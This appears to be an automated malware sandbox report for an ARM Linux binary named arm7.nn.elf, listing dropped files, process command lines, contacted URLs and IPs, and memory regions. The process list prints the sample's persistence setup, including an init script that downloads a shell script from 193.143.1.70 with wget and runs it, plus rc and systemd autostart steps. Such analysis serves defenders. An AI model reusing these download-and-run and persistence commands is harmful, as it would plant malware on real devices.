Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
arm7.nn.elf
|
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
|
initial sample
|
 |
|
|
/etc/init.d/arm7.nn.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
|
/run/user/127/dconf/user
|
very short file (no magic)
|
dropped
|
||
|
/tmp/qemu-open.TVGLav (deleted)
|
ASCII text, with no line terminators
|
dropped
|
There are 2 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/arm7.nn.elf
|
/tmp/arm7.nn.elf
|
||
|
/tmp/arm7.nn.elf
|
-
|
||
|
/tmp/arm7.nn.elf
|
-
|
||
|
/bin/sh
|
/bin/sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/arm7.nn.elf
|
-
|
||
|
/bin/sh
|
/bin/sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
|
/tmp/arm7.nn.elf
|
-
|
||
|
/bin/sh
|
/bin/sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
|
/tmp/arm7.nn.elf
|
-
|
||
|
/bin/sh
|
/bin/sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm7.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm7.nn.elf'\n
/tmp/arm7.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n
echo 'Stopping arm7.nn.elf'\n killall arm7.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo
\\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm7.nn.elf"
|
||
|
/tmp/arm7.nn.elf
|
-
|
||
|
/bin/sh
|
/bin/sh -c "chmod +x /etc/init.d/arm7.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/arm7.nn.elf
|
||
|
/tmp/arm7.nn.elf
|
-
|
||
|
/bin/sh
|
/bin/sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/arm7.nn.elf
|
-
|
||
|
/bin/sh
|
/bin/sh -c "ln -s /etc/init.d/arm7.nn.elf /etc/rc.d/S99arm7.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/arm7.nn.elf /etc/rc.d/S99arm7.nn.elf
|
||
|
/tmp/arm7.nn.elf
|
-
|
||
|
/tmp/arm7.nn.elf
|
-
|
||
|
/tmp/arm7.nn.elf
|
-
|
||
|
/tmp/arm7.nn.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/lib/systemd/systemd-user-runtime-dir
|
/lib/systemd/systemd-user-runtime-dir stop 127
|
There are 47 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi
|
unknown
|
||
|
http://193.143.1.70/curl.sh
|
unknown
|
||
|
http://193.143.1.70/lol.sh
|
unknown
|
||
|
http://193.143.1.70/
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
daisy.ubuntu.com
|
162.213.35.25
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
179.190.151.12
|
unknown
|
Brazil
|
||
|
130.86.103.119
|
unknown
|
United States
|
||
|
142.94.101.1
|
unknown
|
Canada
|
||
|
99.160.179.179
|
unknown
|
United States
|
||
|
192.194.180.106
|
unknown
|
Finland
|
||
|
169.144.206.208
|
unknown
|
United States
|
||
|
81.26.153.182
|
unknown
|
Russian Federation
|
||
|
121.166.161.34
|
unknown
|
Korea Republic of
|
||
|
167.192.35.43
|
unknown
|
United States
|
||
|
49.146.21.20
|
unknown
|
Philippines
|
||
|
99.193.14.30
|
unknown
|
United States
|
||
|
149.207.40.93
|
unknown
|
Germany
|
||
|
144.71.242.47
|
unknown
|
United States
|
||
|
113.67.206.39
|
unknown
|
China
|
||
|
63.107.36.130
|
unknown
|
United States
|
||
|
96.30.91.239
|
unknown
|
Thailand
|
||
|
12.85.245.99
|
unknown
|
United States
|
||
|
222.104.48.15
|
unknown
|
Korea Republic of
|
||
|
184.125.53.220
|
unknown
|
United States
|
||
|
124.33.11.115
|
unknown
|
Japan
|
||
|
37.249.67.204
|
unknown
|
Poland
|
||
|
9.195.190.217
|
unknown
|
United States
|
||
|
60.181.12.68
|
unknown
|
China
|
||
|
208.124.34.162
|
unknown
|
United States
|
||
|
102.45.235.174
|
unknown
|
Egypt
|
||
|
102.186.186.169
|
unknown
|
Egypt
|
||
|
23.239.232.52
|
unknown
|
United States
|
||
|
221.108.86.138
|
unknown
|
Japan
|
||
|
6.237.26.165
|
unknown
|
United States
|
||
|
201.34.59.198
|
unknown
|
Brazil
|
||
|
159.49.9.12
|
unknown
|
United States
|
||
|
192.97.95.82
|
unknown
|
United States
|
||
|
153.48.117.147
|
unknown
|
United States
|
||
|
168.68.20.17
|
unknown
|
United States
|
||
|
108.214.36.92
|
unknown
|
United States
|
||
|
213.233.254.143
|
unknown
|
Netherlands
|
||
|
174.213.191.51
|
unknown
|
United States
|
||
|
11.8.178.4
|
unknown
|
United States
|
||
|
155.132.96.108
|
unknown
|
France
|
||
|
145.49.169.131
|
unknown
|
Netherlands
|
||
|
205.85.225.208
|
unknown
|
United States
|
||
|
105.213.82.132
|
unknown
|
South Africa
|
||
|
1.184.2.166
|
unknown
|
China
|
||
|
186.185.217.104
|
unknown
|
Venezuela
|
||
|
43.42.71.99
|
unknown
|
Japan
|
||
|
38.148.126.220
|
unknown
|
United States
|
||
|
196.189.120.193
|
unknown
|
Ethiopia
|
||
|
20.58.131.47
|
unknown
|
United States
|
||
|
210.219.148.184
|
unknown
|
Korea Republic of
|
||
|
83.114.143.9
|
unknown
|
France
|
||
|
190.125.129.49
|
unknown
|
Colombia
|
||
|
221.194.193.139
|
unknown
|
China
|
||
|
94.98.22.135
|
unknown
|
Saudi Arabia
|
||
|
188.212.176.156
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
|
209.145.93.72
|
unknown
|
United States
|
||
|
147.193.24.78
|
unknown
|
United Kingdom
|
||
|
88.9.229.0
|
unknown
|
Spain
|
||
|
85.223.7.58
|
unknown
|
Netherlands
|
||
|
90.80.80.138
|
unknown
|
France
|
||
|
27.87.49.205
|
unknown
|
Japan
|
||
|
132.66.61.90
|
unknown
|
Israel
|
||
|
183.9.165.150
|
unknown
|
China
|
||
|
102.254.72.195
|
unknown
|
South Africa
|
||
|
185.204.87.169
|
unknown
|
Italy
|
||
|
126.7.190.107
|
unknown
|
Japan
|
||
|
173.159.178.198
|
unknown
|
United States
|
||
|
44.120.3.146
|
unknown
|
United States
|
||
|
8.215.199.92
|
unknown
|
Singapore
|
||
|
159.1.14.252
|
unknown
|
United States
|
||
|
215.139.125.162
|
unknown
|
United States
|
||
|
70.20.103.86
|
unknown
|
United States
|
||
|
145.42.148.145
|
unknown
|
Netherlands
|
||
|
92.13.86.249
|
unknown
|
United Kingdom
|
||
|
26.192.70.191
|
unknown
|
United States
|
||
|
210.134.210.253
|
unknown
|
Japan
|
||
|
165.187.68.118
|
unknown
|
Australia
|
||
|
85.209.31.230
|
unknown
|
Czech Republic
|
||
|
38.9.20.74
|
unknown
|
United States
|
||
|
19.164.88.91
|
unknown
|
United States
|
||
|
29.144.120.18
|
unknown
|
United States
|
||
|
193.143.1.70
|
unknown
|
unknown
|
||
|
71.47.53.250
|
unknown
|
United States
|
||
|
37.162.142.31
|
unknown
|
France
|
||
|
45.154.85.77
|
unknown
|
Serbia
|
||
|
187.171.167.234
|
unknown
|
Mexico
|
||
|
145.155.230.232
|
unknown
|
Netherlands
|
||
|
130.96.80.183
|
unknown
|
United States
|
||
|
59.194.50.237
|
unknown
|
China
|
||
|
104.183.204.119
|
unknown
|
United States
|
||
|
158.26.73.204
|
unknown
|
United States
|
||
|
25.39.112.172
|
unknown
|
United Kingdom
|
||
|
74.31.199.182
|
unknown
|
United States
|
||
|
25.147.32.16
|
unknown
|
United Kingdom
|
||
|
83.240.130.211
|
unknown
|
Portugal
|
||
|
210.39.11.113
|
unknown
|
China
|
||
|
120.221.35.122
|
unknown
|
China
|
||
|
126.79.250.179
|
unknown
|
Japan
|
||
|
11.101.210.12
|
unknown
|
United States
|
||
|
121.30.88.228
|
unknown
|
China
|
||
|
209.120.209.181
|
unknown
|
United States
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7f6050037000
|
page execute read
|
|
||
|
7f6050037000
|
page execute read
|
|
||
|
5612480ee000
|
page execute read
|
|||
|
7f6158869000
|
page read and write
|
|||
|
7f61585fe000
|
page read and write
|
|||
|
7f615829c000
|
page read and write
|
|||
|
7f6158dbb000
|
page read and write
|
|||
|
56124833f000
|
page read and write
|
|||
|
561248348000
|
page read and write
|
|||
|
7f6158bda000
|
page read and write
|
|||
|
7f614ffff000
|
page read and write
|
|||
|
7f6158bda000
|
page read and write
|
|||
|
7f6158ee4000
|
page read and write
|
|||
|
7f605003f000
|
page read and write
|
|||
|
7f6158869000
|
page read and write
|
|||
|
7f615888c000
|
page read and write
|
|||
|
56124c08e000
|
page read and write
|
|||
|
7f605003f000
|
page read and write
|
|||
|
7f6158ee4000
|
page read and write
|
|||
|
56124c08e000
|
page read and write
|
|||
|
7fffbd053000
|
page read and write
|
|||
|
561248348000
|
page read and write
|
|||
|
7f615888c000
|
page read and write
|
|||
|
7f615820a000
|
page read and write
|
|||
|
56124833f000
|
page read and write
|
|||
|
5612480ee000
|
page execute read
|
|||
|
7f6158f4d000
|
page read and write
|
|||
|
7f614ffff000
|
page read and write
|
|||
|
7fffbd135000
|
page execute read
|
|||
|
7f6157a02000
|
page read and write
|
|||
|
56124a346000
|
page execute and read and write
|
|||
|
7fffbd135000
|
page execute read
|
|||
|
7f6158dbb000
|
page read and write
|
|||
|
56124a35d000
|
page read and write
|
|||
|
7f6158f4d000
|
page read and write
|
|||
|
7f6158f08000
|
page read and write
|
|||
|
56124a346000
|
page execute and read and write
|
|||
|
7f6150021000
|
page read and write
|
|||
|
7f61589f8000
|
page read and write
|
|||
|
7f615829c000
|
page read and write
|
|||
|
7f605004a000
|
page read and write
|
|||
|
7f6158f08000
|
page read and write
|
|||
|
7f6157a02000
|
page read and write
|
|||
|
7f61589f8000
|
page read and write
|
|||
|
7f6150021000
|
page read and write
|
|||
|
7fffbd053000
|
page read and write
|
|||
|
56124a35d000
|
page read and write
|
|||
|
7f6050044000
|
page read and write
|
|||
|
7f61585fe000
|
page read and write
|
|||
|
7f6050044000
|
page read and write
|
|||
|
7f615820a000
|
page read and write
|
There are 41 hidden memdumps, click here to show them.